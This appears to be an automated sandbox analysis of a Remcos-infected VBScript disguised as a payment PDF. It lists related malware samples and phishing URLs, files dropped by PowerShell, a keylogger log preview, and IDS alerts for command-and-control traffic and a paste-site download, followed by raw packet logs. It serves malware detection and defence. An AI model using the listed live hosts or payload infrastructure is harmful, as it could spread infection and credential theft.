                                                                                                http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  paste.eek4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                                                  • 188.114.97.3
                                                                                                  Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.96.3
                                                                                                  SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.97.3
                                                                                                  FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.96.3
                                                                                                  SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.97.3
                                                                                                  Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 188.114.96.3
                                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                  • 188.114.97.3
                                                                                                  sostener.vbsGet hashmaliciousXWormBrowse
                                                                                                  • 188.114.96.3
                                                                                                  raw.githubusercontent.comOTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.199.111.133
                                                                                                  k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 185.199.108.133
                                                                                                  PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 185.199.108.133
                                                                                                  ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 185.199.109.133
                                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 185.199.109.133
                                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 185.199.109.133
                                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 185.199.111.133
                                                                                                  na.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 185.199.111.133
                                                                                                  fp2e7a.wpc.phicdn.nethttp://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  5fe2eenspI.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19312.293.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://nextmytelstraaucurelinkisityou.web.app/Get hashmaliciousUnknownBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://pub-3432fdbad0cc4319a435ac6e41d4a0f1.r2.dev/scrpt.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://pub-7571f8ffd5b243f892961d4b09c69e36.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://pub-e8583bd7c3574b5b8171769cd95518de.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  https://pub-92d27a69cbfc4f16942faf2ba89c0aa3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 192.229.221.95
                                                                                                  ab9001.ddns.netSWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  1728033125dd387fed0490e7ade394383eca6a3c5cb1fd0e94f8067e03fabd8e0d741cea5c331.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  17279403650462a4446b0544f642ac8b8bfcc15d509532db8c51a2409d13eb777eadc7c636999.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 45.133.172.96
                                                                                                  Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 45.133.172.96
                                                                                                  Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  1722601625e1f9a4f530f6395665807ae8da7c9d13076e57dbdc05cedb2ad13cd85af8a931941.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  PO#2195112.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  BL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  SWIFT 103 202405291545524610 290524.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                  • 94.156.64.200
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSoriginal.emlGet hashmaliciousTycoon2FABrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                                  • 188.114.96.3
                                                                                                  http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.7.183
                                                                                                  https://danielvasconcellos.com.br/cliente2024Get hashmaliciousPhisherBrowse
                                                                                                  • 188.114.97.3
                                                                                                  SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.26.0.5
                                                                                                  https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                  • 104.18.95.41
                                                                                                  xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                                  • 172.67.206.204
                                                                                                  https://sportmansguilde.com/?https://www.office.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.95.41
                                                                                                  Portal.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 162.159.140.238
                                                                                                  ASN-QUADRANET-GLOBALUSREQUEST FOR QUOTE-INQUIRY#87278.SAMPLE AND PRODUCTS.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                                                                                                  • 72.11.142.133
                                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 45.199.228.213
                                                                                                  81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  • 104.223.122.15
                                                                                                  ae#U03c2.docGet hashmaliciousUnknownBrowse
                                                                                                  • 66.63.187.123
                                                                                                  SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  1728033125dd387fed0490e7ade394383eca6a3c5cb1fd0e94f8067e03fabd8e0d741cea5c331.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 64.188.16.157
                                                                                                  rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 104.223.44.195
                                                                                                  PO906-645S790768.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 66.63.187.171
                                                                                                  hesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 104.247.165.99
                                                                                                  FASTLYUSoriginal.emlGet hashmaliciousTycoon2FABrowse
                                                                                                  • 151.101.194.137
                                                                                                  https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                                                  • 151.101.66.137
                                                                                                  http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                                  • 151.101.2.137
                                                                                                  http://www.twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                                  • 151.101.2.137
                                                                                                  cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htmGet hashmaliciousUnknownBrowse
                                                                                                  • 151.101.66.137
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.199.108.133
                                                                                                  https://sneamcomnnumnlty.com/h474823487284/geting/activeGet hashmaliciousUnknownBrowse
                                                                                                  • 151.101.2.137
                                                                                                  https://pub-7571f8ffd5b243f892961d4b09c69e36.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 185.199.108.153
                                                                                                  https://pub-e8583bd7c3574b5b8171769cd95518de.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 185.199.108.153
                                                                                                  https://pub-92d27a69cbfc4f16942faf2ba89c0aa3.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 185.199.108.153
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  Portal.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  • 185.199.108.133
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):144
                                                                                                  Entropy (8bit):3.3847616575037205
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:rhlKlM+VlC3QlXtrwl55JWRal2Jl+7R0DAlBG45klovDl6v:6lJVlul55YcIeeDAlOWAv
                                                                                                  MD5:EB75D5BA61DB45543AD0B0DB7B0B590D
                                                                                                  SHA1:B5F45D0A9D44B2A98D02D5B3F87A13AC61AA9222
                                                                                                  SHA-256:DC12C56308E6593C7B20F37C8CA7CD749D16ABC5D5773E6F7FF21F744AA1AD7A
                                                                                                  SHA-512:A0F33D55D175DC6ABD5F162AC69E090BC3DC3D2AF139F4E1887A8F9ADA30FA11CCDF673F6F2F4A94377AFF14862153077302D33ABC08F22008FCDEF17197C4D7
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\remcos\logs.dat, Author: Joe Security
                                                                                                  Preview:....[.2.0.2.4./.1.0./.0.7. .0.8.:.5.2.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                  File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Entropy (8bit):3.7260811311343067
                                                                                                  TrID:
                                                                                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                  • MP3 audio (1001/1) 32.22%
                                                                                                  • Lumena CEL bitmap (63/63) 2.03%
                                                                                                  • Corel Photo Paint (41/41) 1.32%
                                                                                                  File name:PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
                                                                                                  File size:196'058 bytes
                                                                                                  MD5:c2159c210774b7d3e8f6d5853a925b5b
                                                                                                  SHA1:18d3bd92eb0417f28d62623e8b8dea7c49450637
                                                                                                  SHA256:47c24878118ddd94cef739adfd6af0572750e7e4f0f8ec5294d0900123c3ceff
                                                                                                  SHA512:279b3c3218025693ca99e34241930a833ac2dfcff928066fac166cb7a6df64b150ab2b91b06b5fb617ba99f1e9692a20904021166784947107e6e0f24d015c51
                                                                                                  SSDEEP:3072:Dx80B378sdN15ERpAfrCGgt5pPGwjiybXol7AQEW26DryTcNaDmt:73zdN1cejCFolDEW26WcNaDK
                                                                                                  TLSH:9B143B0226EA7008F1F22F5696F959B94F77B9592939821D648C1F0F1BE3E80CD617B3
                                                                                                  File Content Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .n.e.j.a.(.g.a.d.o.l.i.n.i.t.e.,. .e.s.c.a.l.a.,. .f.u.m.i.s.t.a.,. .o.p.p.r.i.m.i.r.,. .c.a.n.j.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s.....
                                                                                                  Icon Hash:68d69b8f86ab9a86
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-07T14:52:05.598588+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000564.188.16.15735890TCP
                                                                                                  2024-10-07T14:52:27.199802+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549761188.114.97.3443TCP
                                                                                                  2024-10-07T14:52:27.373866+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11188.114.97.3443192.168.2.549761TCP
                                                                                                  2024-10-07T14:52:27.373866+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11188.114.97.3443192.168.2.549761TCP
                                                                                                  2024-10-07T14:52:49.343623+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54977264.188.16.15735890TCP
                                                                                                  2024-10-07T14:53:11.706900+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54992064.188.16.15735890TCP
                                                                                                  2024-10-07T14:53:34.063069+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54999964.188.16.15735890TCP
                                                                                                  2024-10-07T14:53:56.471791+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000164.188.16.15735890TCP
                                                                                                  2024-10-07T14:54:18.849461+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.55000364.188.16.15735890TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 7, 2024 14:52:23.467483044 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.467504025 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:23.467683077 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.485215902 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.485230923 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:23.944120884 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:23.944196939 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.945897102 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.945909977 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:23.946402073 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:23.953574896 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:23.999408007 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.128586054 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.128861904 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.128942013 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.128952026 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.128981113 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129019976 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.129074097 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129230022 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129270077 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.129283905 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129404068 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129442930 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.129451990 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129554033 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.129595041 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.129607916 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.172218084 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.172239065 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.211882114 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.211976051 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.211993933 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.212023020 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212059975 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.212081909 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212371111 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212405920 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.212415934 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212523937 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212575912 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.212583065 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212693930 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.212742090 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.212754011 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213000059 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213041067 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.213049889 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213186979 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213227034 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.213234901 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213346958 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213387012 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.213393927 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213495016 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.213535070 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.213545084 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214102030 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214147091 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.214157104 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214267015 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214307070 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.214315891 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214412928 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.214452028 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.214458942 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.265940905 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.265975952 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305335999 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305445910 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.305448055 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305480003 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305519104 CEST49740443192.168.2.5185.199.108.133
                                                                                                  Oct 7, 2024 14:52:24.305567026 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305754900 CEST44349740185.199.108.133192.168.2.5
                                                                                                  Oct 7, 2024 14:52:24.305794954 CEST49740443192.168.2.5185.199.108.133
